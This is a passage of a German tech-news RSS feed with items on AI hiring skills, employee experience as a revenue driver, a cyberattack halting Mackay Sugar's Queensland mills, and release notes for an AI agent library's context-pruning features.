<p>Historically, Linux support on ARM laptops has varied significantly between devices. Some systems work exceptionally well, while others require manual configuration, custom kernels, or vendor-specific patches.</p></div>
      
            <div class="field field--name-node-link field--type-ds field--label-hidden field--item">  <a href="https://www.linuxjournal.com/content/canonical-launches-arm-laptop-certification-program-boost-ubuntus-next-generation-mobile" hreflang="en">Go to Full Article</a>
</div>
      
    </div>
  </div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI experience is the hottest IT hiring need. What if you don’t have much?]]></title>
<description><![CDATA[AI has quickly become a top skill on the IT talent market, with 91% of IT leaders prioritizing AI expertise when hiring this year, according to recent survey from AI analytics vendor Reveal. Eight in 10 of tech leaders reported using AI in software development and 77% said expanding AI use throug...]]></description>
<link>https://tsecurity.de/de/3590001/it-nachrichten/ai-experience-is-the-hottest-it-hiring-need-what-if-you-dont-have-much/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590001/it-nachrichten/ai-experience-is-the-hottest-it-hiring-need-what-if-you-dont-have-much/</guid>
<pubDate>Thu, 11 Jun 2026 11:32:31 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>AI has quickly become a top skill on the IT talent market, with 91% of IT leaders prioritizing AI expertise when hiring this year, according to <a href="https://wp-staging.revealbi.io/whitepapers/reveal-it-talent-survey-top-technology-roles-and-skills-for-2026?fwp=0&amp;nocache=2" rel="nofollow">recent survey from AI analytics vendor Reveal</a>. Eight in 10 of tech leaders reported using AI in software development and 77% said expanding AI use throughout the organization is a top strategic goal for 2026.</p>



<p>However, as typically happens when there’s a rush to adopt any emerging tech, the talent market often can’t keep pace, creating a talent gap around these new, in-demand skills. According to Reveal, 50% of organizations already cite difficulties in “recruiting and retraining skilled technical staff,” while 80% say the shortage is directly impacting the organization’s operations and ability to act on AI projects — a <a href="https://www.cio.com/article/4165232/whats-holding-back-enterprise-ai-shortage-of-talent-cios-say.html">challenge confirmed by CIO.com’s 2026 State of the CIO Survey</a>.</p>



<p>While the talent market takes time to meet the demand, leaders will likely be looking to prioritize candidates who show a mix of technical, business, and communication skills as that can help “bridge the gap between AI output and actual results,” says Kareem Osman, VP and market director of technology talent solutions at Robert Half.</p>



<h2 class="wp-block-heading">Highlighting valuable technical skills for AI</h2>



<p>While concerns around AI-related layoffs and job displacement are rising, 48% of Reveal survey respondents say they have instead seen AI-related job creation, while 18% reported layoffs — further indication that <a href="https://www.cio.com/article/4012162/ai-begins-to-reshape-the-it-job-landscape-as-layoffs-rise.html">AI is reshaping the job landscape in conflicting ways</a>.</p>



<p>As these new jobs arise, filling them requires a flexible understanding of the concept of AI experience, which can range from proven hands-on experience with AI tools and services, to AI-adjacent knowledge of relevant programming languages, cybersecurity, or other relevant skills.</p>



<p>“Many companies are still experimenting with AI, so ‘experience’ can come from a mix of formal credentials and hands-on use cases — that could be examples of saving time, improving decision-making, or creating more effective outputs. What stands out right now is the ability to interpret AI results and apply judgment. It’s not just about the tools you’re familiar with but more about how you’ve used it to improve real work,” says Osman.</p>



<p>Job descriptions and listings will give a better idea of what a company is looking for, but according to Reveal, the most sought-after technical skills include Python (56%), machine learning (47%), Java (34%), and cybersecurity (33%), along with C/C++, SQL, .NET, JavaScript frameworks, and web development. The report points out that smaller organizations tend to look for C/C++ and cybersecurity skills for infrastructure needs, whereas larger organizations are more likely to emphasize a need for Python and AI-specific skills.</p>



<p>“Tech roles today are much more connected and less siloed, so drawing a clear line between past IT experience and AI applications can really strengthen a resume,” says Osman.</p>



<h2 class="wp-block-heading">Demonstrating AI or AI-adjacent experience</h2>



<p>Despite being a relatively new technology, companies are eager to hire talented workers with experience or expertise with AI and AI-powered tools. The hardest-to-fill tech role, according to Reveal’s data, is AI engineer (39%), followed by cybersecurity engineers (38%) as AI raises concerns around privacy and compliance.</p>



<p>If you aren’t an AI engineer or you don’t have cybersecurity experience, there are other opportunities to highlight relevant skills on your resume that translate well to AI skills or demonstrate you are eager to upskill. Robert Half’s Osman recommends highlighting any projects or workflows where you’ve used AI, explaining what the problem was, how you and your team used AI to address it, and the ultimate results.</p>



<p>“When it comes to AI, employers are placing more value on practical application and clear thinking than just years of experience. Even one strong example of AI application in your work can go a long way, so it’s worth digging into if it aligns with the role,” he says.</p>



<p>Emphasize work experience that shows you know <a href="https://www.cio.com/article/4163373/cios-bring-ai-transformation-home-to-it-workflows.html">how to improve workflows</a>, translate technical concepts, communicate across teams, or solve business problems strategically. Demonstrate instances where you’ve helped your organization save time, improved outputs or decision-making, refined processes, met or reduced budgets, collaborated across different business units, and other similar examples to show that you understand the overall goal of AI implementation is to improve productivity and efficiency.</p>



<p>“Highlight the things that make a recruiter want to find out more. That could be examples of saving time, improving decision-making, or creating more effective outputs. What stands out right now is the ability to interpret AI results and apply judgment. It’s not just about the tools you’re familiar with but more about how you’ve used it to improve real work,” says Osman.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why employee experience is now a revenue driver]]></title>
<description><![CDATA[As quoted by Doug Conant, “To win in the marketplace, you must first win in the workplace.”



For many years, I treated this quote as motivational wall art, a nice sentiment, but not exactly a business strategy. Employee engagement for me was always an HR checkbox, which is important but ultimat...]]></description>
<link>https://tsecurity.de/de/3589928/it-security-nachrichten/why-employee-experience-is-now-a-revenue-driver/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589928/it-security-nachrichten/why-employee-experience-is-now-a-revenue-driver/</guid>
<pubDate>Thu, 11 Jun 2026 11:05:29 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>As quoted by <a href="https://conantleadership.com/wp-content/uploads/2015/12/speaker_sheet_final1-2.pdf" rel="nofollow">Doug Conant</a>, “To win in the marketplace, you must first win in the workplace.”</p>



<p>For many years, I treated this quote as motivational wall art, a nice sentiment, but not exactly a business strategy. Employee engagement for me was always an HR checkbox, which is important but ultimately unimportant to revenue and growth.</p>



<p>Old me always felt that EX (employee experience) was a “nice to have,” not something that could move the financial needle.</p>



<p>But now this perspective has fundamentally changed. </p>



<p>With years of experience, I now understand that motivated and empowered employees don’t just perform better, they directly impact the bottom line, i.e., your overall revenue.</p>



<p>I have seen that engaged employees innovate faster. They are experienced enough to resolve customer issues in half the time and create the kind of brand loyalty that turns customers into advocates.</p>



<p>Organizations that invest strategically in employee experience are seeing measurable returns: <a href="https://www.gallup.com/q12-employee-engagement-survey/" rel="nofollow">Gallup’s research shows </a>that highly engaged teams achieve 23% greater profitability.</p>



<p>Based on this experience, I thought I must pen down my learning with my fellow leaders on how this realization reshaped my perspective.</p>



<p>What once seemed secondary is now a core business driver, changing how priorities are set, how teams are led and how performance is measured.</p>



<h2 class="wp-block-heading">The turning point</h2>



<p>The shift wasn’t gradual. As a matter of fact, it was fast and has changed everything.</p>



<p>We’ve been consistently hitting our numbers.</p>



<p>Revenue targets? Met.</p>



<p>Quarterly projections? On track.</p>



<p>But still something felt fundamentally off.</p>



<p>The warning signs were everywhere, hiding in plain sight. But it was I who was unaware of them.</p>



<p>Let’s go through some of them:</p>



<ul class="wp-block-list">
<li>High-performing employees were leaving without clear reasons (three senior engineers in four months, two mobile app developers in a quarter).</li>



<li>Teams that once moved with vision, speed and ownership have started showing signs of fatigue.</li>



<li>Communication across teams started to weaken, leading to misalignment.</li>
</ul>



<p>On paper, everything looked healthy and stable, but…When we ran the numbers, the financial reality became impossible to ignore.</p>



<p>Replacing each departing senior employee costs us between 70%, including recruitment fees, onboarding, lost productivity during the ramp period and the knowledge gap left behind.</p>



<p>Can you imagine we had spent a significant portion of our overall hiring budget in just 9 months backfilling roles?</p>



<p>On the other hand, the hidden costs were even more alarming:</p>



<ul class="wp-block-list">
<li><strong>Lost revenue from disrupted client relationships</strong>: When our customer success lead left mid-cycle, we experienced gaps in follow-ups, overscheduling of client calls and changing points of contact, resulting in the account not being renewed.</li>



<li><strong>Delayed product launches</strong>: Our new product version release was delayed by 2 quarters. The reason behind this was that the original technical lead left and the replacement needed 5 months just to understand the workflows.</li>



<li><strong>Declining win rates</strong>: A lack of team alignment, untimely responses and frequent task rescheduling disrupted workflows, making it harder for teams to deliver the new product version on time.</li>
</ul>



<p>Finding all these hidden costs, I was staring at an invisible tax on every business outcome.</p>



<p>We analyzed that if this continued for another year, we would be looking at a 42%  decline in our expected revenue. This cost is equivalent to losing nearly half of our annual growth target, not from market forces or competitive pressure, but from internal attrition.</p>



<h2 class="wp-block-heading">The hidden mechanics: 4 pathways from employee experience to revenue</h2>



<p>After finding the challenges, I focused on understanding its structure, not just that employee experience mattered, but also how EX impacted each part of the business.</p>



<p>What I discovered wasn’t a simple cause-and-effect relationship. It was an interconnected system in which employee experience served as the underlying operating system for every revenue-generating function.</p>



<p>In my discovery, I found four distinct pathways, each either accelerating growth or quietly reducing it. </p>



<h3 class="wp-block-heading">Pathway 1: Retention = institutional knowledge = execution velocity</h3>



<p>When an employee leaves, they are not just walking out the door but taking their skills and your company’s accumulated intelligence.</p>



<p>I can relate to this fact, when our lead developer left, she didn’t just take her coding ability. She took:</p>



<ul class="wp-block-list">
<li>The unwritten knowledge of why certain architectural decisions were made a few months ago</li>



<li>Relationships with the internal team who trusted her skills </li>



<li>The shortcuts and workarounds that made our deployment process 40% faster</li>



<li>The ability to look at a bug and immediately spot the integration issues that our documentation never covered</li>
</ul>



<p>The revenue impact was surgical and devastating: New hires require 3-4 months to reach full productivity in any complex or executive roles, which means everything moves more slowly during that entire ramp period.</p>



<p>Deal cycles that took 60 days stretched to 90. Strategic decisions made in real time now needed additional review layers because the new person didn’t have the context to move with confidence.</p>



<p>We measured the delta: Employees with over two years of experience delivered 34% better customer retention and 28% more contracts than newer joinees. But the gap wasn’t just about skill, it was about trust velocity.</p>



<p>Experienced employees operated with well-established client trust and there was flawless cross-functional collaboration between them.</p>



<p>But now, with new employees, this had to be recreated from scratch.</p>



<p><strong>What fundamentally changed my thinking:</strong> I had always budgeted for direct replacement costs, 14% for recruiting, the 15% for onboarding and training. What I never budgeted for was the invisible tax of having B-level productivity in A-level seats for 3-4 months while new hires ramped.</p>



<p>The main gap between what an experienced, old employee produces and what a new joiner (with 10% of product knowledge) produces was costing us 15–20% of potential output across affected teams.</p>



<p>Retention wasn’t an HR metric. It was a margin protection strategy.</p>



<h3 class="wp-block-heading">Pathway 2: Engagement = innovation = competitive differentiation</h3>



<p>The truth I took too long to accept is that “disengaged employees still do their jobs, but engaged employees improve their jobs.”</p>



<p>This difference is everywhere, especially in renovation, where small, regular improvements add up to a big competitive edge.</p>



<p>The innovation gap emerged in our product roadmap: I asked our development team to trace the origins of our new versions over the past two years.</p>



<p>The results were unexpected: 73% ideas originated from developers who felt psychologically safe enough to propose ideas outside their sprint commitments.</p>



<p>In a nutshell, most creative ideas didn’t come from structured sessions. They mainly came from casual internal chat where people felt confident that their ideas would be heard.</p>



<p>The remaining 27% came from leadership demands, customer problems, driven by urgency. </p>



<p>The customer-facing gap was the most painful: The support team had been highly proactive, often resolving issues before they arose. During the disengagement period, that proactive momentum dropped significantly, leading to growing misalignment among team members.</p>



<p><strong>What fundamentally changed my thinking:</strong> Old me believed that a strong resume drove creation, but my experience taught me otherwise. My best hire was a self-taught developer who transformed our CI/CD pipelines not just through skills, but because she could experiment freely without waiting for approval. </p>



<h3 class="wp-block-heading">Pathway 3: Disengagement = lost upsell opportunity = revenue left on the table</h3>



<p>In my experience, this pathway has been one of the trickiest and, frankly, the one that took the longest to identify.</p>



<p>Disengaged employees don’t just underperform; they stop seeing opportunities altogether.</p>



<p>I’ll share one experience that I only fully understood later. One of our disengaged employees was running a renewal drip email campaign for a key customer. On the surface, everything looked fine: emails were going out on time, reminders were sent and the process was being followed. But the employee in question never went beyond the script and never asked about the client’s growth plans, changing needs, or future direction.</p>



<p>The breaking point came during a customer email when we lost one of our major customers, not through churn, but through a missed opportunity. They moved to a competitor offering a more comprehensive solution.</p>



<p>The real issue surfaced during the account exit discussion. One of their C-level leaders wrote something that made the gap painfully clear. He said:</p>



<p>“We would have upgraded to your ultimate control plan months ago if someone had consistently followed up or even asked about our growth plans. We assumed you weren’t interested in expanding with us because every interaction felt limited to renewal emails.”</p>



<p>We left significant revenue on the table, not due to product limitations. Because of our overwhelmed and disengaged team, which simply missed discussing or asking follow-up questions over emails and didn’t ask the right questions to surface the opportunity.</p>



<p>After this, we decided to track “missed expansion opportunities,” and the numbers were brutal:</p>



<ul class="wp-block-list">
<li>Customer success teams reported that a substantial portion of churned customers had expressed needs during support calls that our premium features could have addressed, but nobody connected those dots or escalated them as expansion opportunities</li>



<li>In account reviews, we found multiple instances where customers were building workarounds or buying complementary tools from other vendors to solve problems our existing product could handle, but we just never offered them.</li>
</ul>



<p><strong>What fundamentally changed my thinking:</strong> I had always viewed the customer success team as a retention function that helps organizations keep customers happy, renew contracts and avoid customer churn. That separation was strategically flawed.</p>



<p>Retention without expansion is defensive. Expansion is how you turn customers into compounding revenue streams.</p>



<p>But expansion requires two things disengagement destroys:</p>



<ol start="1" class="wp-block-list">
<li><strong>Deep product and customer knowledge</strong> (which walks out the door when experienced people leave)</li>



<li><strong>Proactive energy and investment</strong> (which evaporates when people are overwhelmed and checked out)</li>
</ol>



<p>The new joiners can reach this point yet, as they are new to the product and still need a lot of knowledge to acknowledge clients’ needs.</p>



<p>As a result, expansion opportunities slowed and revenue from existing accounts remained untapped.</p>



<h3 class="wp-block-heading">Pathway 4: Attrition = talent scarcity = higher acquisition costs</h3>



<p>When experienced employees leave, you don’t just lose their output; you reset the talent bar for every future hire.</p>



<p>When we lost senior engineers and account managers, we didn’t just need “replacements,” we needed people with specific technical expertise. People who deeply understand how product companies operate and have the ability to hit the ground running in complex environments.</p>



<p>The talent acquisition challenge compounded quickly: Our recruiters had to dig much deeper to find candidates who met our requirements. We needed engineers proficient in specific technology, familiar with our industry’s norms and experienced enough to navigate difficult problems without constant hand-holding.</p>



<p>The challenge: those candidates are rare, expensive and have multiple offers.</p>



<p>The margin erosion was measurable:</p>



<ul class="wp-block-list">
<li>Cost-per-hire increased dramatically as we competed for scarce specialized talent</li>



<li>Time-to-fill stretched as we rejected underqualified candidates, leaving revenue-generating roles empty longer</li>



<li>Recruiting resources shifted from growth hiring to backfilling attrition</li>
</ul>



<p>The compounding effect: Poor retention → higher talent requirements → longer searches → more expensive offers → pressure to lower standards → weaker hires → worse outcomes → more attrition → repeat.</p>



<p><strong>What fundamentally changed my thinking: </strong>Retention isn’t an HR metric. It’s a talent acquisition cost-avoidance strategy. Every senior employee who stays is one fewer impossible-to-fill role your recruiters have to source in a competitive market.</p>



<h2 class="wp-block-heading">The multiplier effect: Why small drops create cascading failures</h2>



<p>What blindsided me was that these four pathways don’t operate independently. In fact, they amplify and accelerate each other.</p>



<p>When one senior engineer left, the damage didn’t stop:</p>



<ul class="wp-block-list">
<li><strong>The replacement took 4 months to reach full productivity</strong> (Pathway 1: Retention = institutional knowledge = execution velocity)</li>



<li><strong>During that 3-4 month gap, the team experienced a 17% </strong>slowdown in development because we lost institutional knowledge and had to onboard a new person (Pathway 2: Innovation).</li>



<li><strong>Two customers cited concerns about account management</strong> in exit surveys because the new account manager couldn’t identify upsell opportunities the way the experienced manager had (Pathway 3: Disengagement = lost upsell opportunity)</li>



<li><strong>Three other team members saw the lack of backfill support, felt the increased workload and started interviewing elsewhere</strong>—making the already-difficult talent search even harder (Pathway 4: Attrition = talent scarcity = higher acquisition costs)</li>
</ul>



<p>One departure accounted for 70% of the measurable cascading impact across all four pathways.</p>



<p>But here’s the insight that changed everything: Employee experience isn’t linear; it’s exponential.</p>



<ul class="wp-block-list">
<li>One toxic manager can infect three teams in a single quarter</li>



<li>One great manager can elevate an entire division in six months</li>



<li>One highly visible departure can trigger a race if people interpret it as “the best people are leaving.”</li>



<li>One highly visible retention (turning down a competitor’s offer) can stabilize a nervous team</li>
</ul>



<p>Employee Experience isn’t overhead. It’s a revenue multiplier with a 4-5 month lag, and most leaders never measure it until the damage is irreversible.</p>



<h2 class="wp-block-heading">The results: What changed</h2>



<p>Four months after we committed to treating employee experience as a revenue strategy, the data told a story that even the most skeptical members of our leadership team couldn’t dismiss.</p>



<p>But the journey wasn’t a smooth upward curve; it was messy, nonlinear and full of surprises.</p>



<h3 class="wp-block-heading">The quantified outcomes: What the metrics actually showed</h3>



<p>Here’s what changed across our core employee experience and business metrics:</p>



<p>Employee-side metrics:</p>



<ul class="wp-block-list">
<li>Voluntary turnover dropped from 18% to 9%, cutting our attrition rate in half</li>



<li>Internal mobility doubled from 22% to 41%, meaning we were filling nearly half of open roles with internal candidates who already understood our culture and systems</li>



<li>Time-to-productivity for new hires decreased from 5 months to 3 months, and people were ramping 32% faster because they had better onboarding and more engaged teams supporting them</li>
</ul>



<p>Business-side metrics (the ones that actually matter to the board):</p>



<ul class="wp-block-list">
<li>Enterprise sales close rate recovered from 26% back to 33% (nearly returning to our pre-crisis levels).</li>



<li>Average contract value increased by 19% (engaged customer success leads were upselling and expanding accounts instead of just managing renewals).</li>



<li>Customer churn dropped from 8.2% to 5.1% (a direct result of more consistent, invested customer service).</li>
</ul>



<p>Financial impact: The combined effect of reduced attrition, faster ramp times, improved sales performance and lower customer churn translated into an approximately 42% increase in the annual revenue run rate over 6 months.</p>



<h2 class="wp-block-heading"><a></a>What I wish I’d known going in</h2>



<p>If I could go back to the beginning of this transformation, here’s what I’d tell myself:</p>



<ul class="wp-block-list">
<li><strong>The first two months will test your commitment.</strong> Metrics will get worse as you expose hidden problems. Don’t panic. Don’t retreat. Trust the process.</li>



<li><strong>You’ll lose some people, and that’s okay.</strong> Some managers won’t adapt. Some employees thrived in the old dysfunction. Letting them go is part of the healing.</li>



<li><strong>The ROI is real, but it’s not immediate.</strong> Build a coalition of believers on your leadership team and board who understand that this is a 4-5-month investment, not a quick fix.</li>



<li><strong>Employees are watching for consistency, not perfection.</strong> You’ll make mistakes. What matters is whether you acknowledge them, adjust and keep moving forward.</li>



<li><strong>The moment you treat employee experience as optional, it becomes worthless.</strong> This only works if it’s a non-negotiable strategic priority, measured and managed like revenue.</li>
</ul>



<h2 class="wp-block-heading">Conclusion: Employee experience as infrastructure, not initiative</h2>



<p>Doug Conant was right: to win in the marketplace, you must first win in the workplace. But I’d added a critical line to this: “your employees are your first customers and they’re either selling for you or quietly selling against you.”</p>



<p>Eighteen months into this transformation, employee experience moved from an HR metric to a core business driver in my organization. Leadership conversations, performance metrics and strategic decisions now reflect its impact. In a talent-driven environment, this shift created an advantage that competitors cannot easily replicate because culture requires sustained commitment, not just investment.</p>



<p>Neglect carries a real cost. Disengagement, attrition and broken trust compound quietly before showing up in revenue, customer relationships and execution speed.</p>



<p>A clear conclusion emerged from this journey. Investing in employee experience strengthens the business’s foundation, while ignoring it guarantees a far more expensive rebuild later.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><strong><a href="https://www.cio.com/expert-contributor-network/">Want to join?</a></strong></p>



<p></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Mackay Sugar Security Incident Forces Mill Shutdowns and Halts Harvesting Operations]]></title>
<description><![CDATA[Australia's second-largest sugar producer, Mackay Sugar, is investigating a cyberattack that has disrupted parts of its operations and temporarily halted sugarcane harvesting in Queensland's Mackay region. The Mackay Sugar security incident has led to the suspension of milling activities at two o...]]></description>
<link>https://tsecurity.de/de/3589809/it-security-nachrichten/mackay-sugar-security-incident-forces-mill-shutdowns-and-halts-harvesting-operations/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589809/it-security-nachrichten/mackay-sugar-security-incident-forces-mill-shutdowns-and-halts-harvesting-operations/</guid>
<pubDate>Thu, 11 Jun 2026 10:12:39 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="1101" height="614" src="https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Mackay Sugar Security Incident" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar.webp 1101w, https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar-1024x571.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar-768x428.webp 768w, https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar-750x418.webp 750w, https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar.webp 1101w, https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar-300x167.webp 300w, https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar-1024x571.webp 1024w, https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar-768x428.webp 768w, https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar-600x335.webp 600w, https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar-150x84.webp 150w, https://thecyberexpress.com/wp-content/uploads/Mackay-Sugar-750x418.webp 750w" sizes="(max-width: 1101px) 100vw, 1101px" title="Mackay Sugar Security Incident Forces Mill Shutdowns and Halts Harvesting Operations 1"></p><span data-contrast="auto">Australia's second-largest sugar producer, Mackay Sugar, is investigating a cyberattack that has disrupted parts of its operations and temporarily halted sugarcane harvesting in Queensland's Mackay region. The Mackay Sugar security incident has led to the suspension of milling activities at two of the company's facilities while cybersecurity specialists and authorities work to determine the nature and impact of the attack.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">In a statement released on Wednesday, Mackay Sugar confirmed that it was responding to a <a class="wpil_keyword_link" href="https://cyble.com/knowledge-hub/what-is-cybersecurity/" target="_blank" rel="noopener" title="cybersecurity" data-wpil-keyword-link="linked" data-wpil-monitor-id="28663">cybersecurity</a> incident affecting some of its operations. The sugar producer said its immediate priorities are ensuring the safety of employees, protecting operational systems, and maintaining business continuity during the investigation.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">"Our immediate focus is the safety of our people, protecting operational systems, and maintaining business continuity," the company said.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Mackay Sugar Security Incident Disrupts Key Operations</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">According to the <a href="https://www.mkysugar.com.au/news-updates-circulars/mackay-sugar-cyber-security-incident" target="_blank" rel="nofollow noopener">company</a>, specialist cybersecurity experts have been engaged to assist with the investigation and recovery efforts. Mackay Sugar also said it is working closely with relevant authorities to examine the incident and restore affected systems safely.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">The Mackay Sugar <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="28667">security</a> incident has had a direct impact on production activities. Local media reports indicated that the company was forced to shut down its Farleigh and Racecourse sugar mills, two major facilities located in Queensland's Mackay region. As a result, growers were instructed to stop harvesting sugarcane until further notice.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">Canegrowers Mackay, an organization representing local sugarcane farmers, confirmed the directive in a statement issued on Wednesday.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">"Mackay Sugar has asked for all harvesting to cease immediately and not resume until further communication comes directly from the company," the statement read.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">The organization further confirmed that both sugar milling and cane haulage operations at the Farleigh and Racecourse mills had been suspended. The disruption comes shortly after both facilities commenced their annual sugarcane crushing season.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Growers Await Further Updates</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">While the shutdown has affected many growers in the region, producers in the Marian district have not experienced any immediate impact. According to a report from <a href="https://www.abc.net.au/news/2026-06-10/cyber-attack-shuts-down-north-queensland-sugar-mills/106780304" target="_blank" rel="nofollow noopener">Australia's ABC News</a>, Mackay Sugar's third mill, located in the district, is not scheduled to begin operations until next week.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">The sugar producer said it has implemented interim processes and temporary measures to support essential business functions and reduce operational disruption while <a href="https://thecyberexpress.com/shoshone-bannock-tribes-cyberattack/" target="_blank" rel="noopener">recovery</a> efforts continue.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">"Interim processes are in place to support critical business functions and minimise disruption where possible," the company stated.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">The company also emphasized that it is maintaining communication with employees, growers, and business partners throughout the incident.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">"We are communicating directly with our employees, growers, and key partners and will continue to provide updates as more information becomes available," Mackay Sugar said.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>
<h3 aria-level="2"><b><span data-contrast="none">Investigation Continues as Details Remain Limited</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">At this stage, the sugar producer has not disclosed specific details about the <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="28664">cyberattack</a>. The company has not indicated whether sensitive <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-data/" title="data" data-wpil-keyword-link="linked" data-wpil-monitor-id="28666">data</a> was compromised or whether the incident involved ransomware or another form of malicious activity.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">Mackay Sugar reiterated that it takes cybersecurity responsibilities seriously and acknowledged the uncertainty caused by the disruption.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">"We take our responsibility to protect our systems, operations and information very seriously. We apologise for any disruption or uncertainty this incident may cause and we will provide timely updates as we continue our investigation," the company said.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">The ongoing Mackay Sugar security incident highlights the operational <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-are-risks-in-cybersecurity/" title="risks" data-wpil-keyword-link="linked" data-wpil-monitor-id="28665">risks</a> cyberattacks can pose to critical industries. As investigations continue, the company is focused on restoring systems safely while minimizing impacts on growers and production activities.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>

<span data-contrast="auto">Mackay Sugar operates three mills and generates annual revenue exceeding $420 million. The sugar producer supplies raw sugar to domestic customers and international markets, including South Korea, Indonesia, Japan, and Malaysia. Further updates regarding the Mackay Sugar security incident are expected as the investigation progresses and additional information becomes available.</span><span data-ccp-props='{"335551550":0,"335551620":0}'> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[v15.11.0]]></title>
<description><![CDATA[@oh-my-pi/pi-agent-core
Breaking Changes

Removed compaction/index.ts re-export of snapcompact helpers, so snapcompact utilities are no longer available from the agent compaction barrel and should be imported from @oh-my-pi/snapcompact
Removed the convertToLlm alias export from compaction/message...]]></description>
<link>https://tsecurity.de/de/3589080/tools/v15110/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3589080/tools/v15110/</guid>
<pubDate>Thu, 11 Jun 2026 00:25:07 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h2>@oh-my-pi/pi-agent-core</h2>
<h3>Breaking Changes</h3>
<ul>
<li>Removed <code>compaction/index.ts</code> re-export of snapcompact helpers, so snapcompact utilities are no longer available from the agent compaction barrel and should be imported from <code>@oh-my-pi/snapcompact</code></li>
<li>Removed the <code>convertToLlm</code> alias export from <code>compaction/messages</code> — it duplicated <code>defaultConvertToLlm</code> under a second name. Import <code>defaultConvertToLlm</code> (array form) or the new <code>convertMessageToLlm</code> (single-message form) instead</li>
</ul>
<h3>Added</h3>
<ul>
<li>Added <code>convertMessageToLlm()</code>: the single-message core transformer behind <code>defaultConvertToLlm()</code>. Embedders with app-specific message roles should handle their own roles and delegate every core role (<code>user</code>/<code>developer</code>/<code>assistant</code>/<code>toolResult</code>/<code>custom</code>/<code>hookMessage</code>/<code>branchSummary</code>/<code>compactionSummary</code>) to it instead of duplicating the conversion — a duplicated <code>compactionSummary</code> case is how snapcompact frames once silently dropped off provider requests</li>
<li>Added <code>pruneSupersededToolResults()</code> and the opt-in <code>PruneConfig.supersedeKey</code> hook so harnesses can prune stale tool results superseded by a newer read of the same file; superseded results are pruned ahead of age-based victims during overflow pruning and replaced with a <code>[Superseded by a newer read of this file]</code> placeholder. Without the new config, <code>pruneToolOutputs()</code> behavior is unchanged.</li>
<li>Added <code>readToolSupersedeKey()</code> implementing the read-tool path/selector grammar (selector-free reads supersede range reads of the same file; URL-scheme paths exempt). Pruning honors prompt-cache economics: per-turn prunes only fire when the post-candidate suffix is small or the cache is cold (idle gap).</li>
